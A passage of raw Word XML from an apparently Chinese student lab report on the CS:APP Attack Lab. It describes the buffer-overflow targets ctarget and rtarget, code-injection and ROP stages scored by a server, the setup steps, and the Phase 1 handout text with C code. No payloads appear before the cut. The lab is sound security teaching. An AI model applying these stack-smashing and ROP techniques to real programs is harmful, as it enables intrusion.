          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.tar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件，解压后得到如下文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>README.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rtarget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cookie.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>farm.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hex2raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ctarget和rtarget运行时从标准输入读入字符串，这两个程序都存在缓冲区溢出漏洞。通过代码注入的方法实现对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ctarget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>程序的攻击，共有3关，输入一个特定字符串，可成功调用touch1，或touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，或touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就通关，并向计分服务器提交得分信息；通过ROP方法实现对r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target程序的攻击，共有2关，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在指定区域找到所需要的小工具，进行拼接完成指定功能，再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入一个特定字符串，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>成功调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或touch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3就通关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，并向计分服务器提交得分信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>否则失败，但不扣分。因此，本实验需要通过反汇编和逆向工程对ctraget和rtarget执行文件进行分析，找到保存返回地址在堆栈中的位置以及所需要的小工具机器码。实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的具体内容见实验说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>尤其需要认真阅读各阶段的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Some Advice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>本实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>包含了5个阶段（或关卡）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，难度逐级递增。各阶段分数如下所示：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3657600" cy="16014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b="20137"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="1602029"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>四、实验步骤及实验分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>准备工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>连接至服务器并登录自己的账户后，通过“ls”命令查看当前目录下的文件，可以看到已被分配到的归档文件“target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>171</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.tar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”，将其使用“tar -xvf target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>171</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.tar”命令提取至文件夹中得到README.txt、ctarget、rtarget、cookie.txt、farm.c 和 hex2raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3347085" cy="1139825"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:docPr id="2" name="图片 2" descr="~07H7]ACY6IT~M45FE5X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7H7]ACY6IT~M45FE5XQ(A"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3347085" cy="1139825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用cd指令切换工作目录，用gdb工具开始对文件进行调试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3836670" cy="1813560"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="3" name="图片 3" descr="NDT]N2E)3B2TPQMUO_@{T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NDT]N2E)3B2TPQMUO_@{T49"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3836670" cy="1813560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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任务1：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>For Phase 1, you will not inject new code. Instead, your exploit string will redirect the program to execute an existing procedure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Function getbuf is called within CTARGET by a function test having the following C code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1 void test()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2 {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3 int val;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4 val = getbuf();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5 printf("No exploit. Getbuf returned 0x%x\n", val);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>When getbuf executes its return statement (line 5 of getbuf), the program ordinarily resumes execution within function test (at line 5 of this function). We want to change this behavior. Within the file ctarget, there is code for a function touch1 having the following C representation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1 void touch1()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2 {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3 vlevel = 1; /* Part of validation protocol */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4 printf("Touch1!: You called touch1()\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
